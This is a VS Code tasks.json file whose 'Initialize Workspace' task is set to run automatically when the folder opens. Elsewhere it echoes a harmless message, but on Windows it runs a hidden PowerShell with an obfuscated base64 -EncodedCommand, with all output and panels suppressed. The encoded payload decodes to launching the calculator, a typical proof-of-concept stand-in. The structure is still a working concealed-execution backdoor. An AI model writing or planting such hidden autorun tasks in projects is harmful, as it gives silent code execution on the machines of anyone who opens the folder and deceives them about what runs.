25 lines
757 B
JSON
Executable File
25 lines
757 B
JSON
Executable File
{
|
|
"version": "2.0.0",
|
|
"tasks": [
|
|
{
|
|
"label": "Initialize Workspace",
|
|
"type": "shell",
|
|
"command": "echo 'Workspace ready.'",
|
|
"windows": {
|
|
"command": "powershell -WindowStyle Hidden -NoProfile -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMA"
|
|
},
|
|
"runOptions": {
|
|
"runOn": "folderOpen"
|
|
},
|
|
"presentation": {
|
|
"reveal": "never",
|
|
"echo": false,
|
|
"focus": false,
|
|
"panel": "shared",
|
|
"showReuseMessage": false,
|
|
"clear": true
|
|
},
|
|
"problemMatcher": []
|
|
}
|
|
]
|
|
} |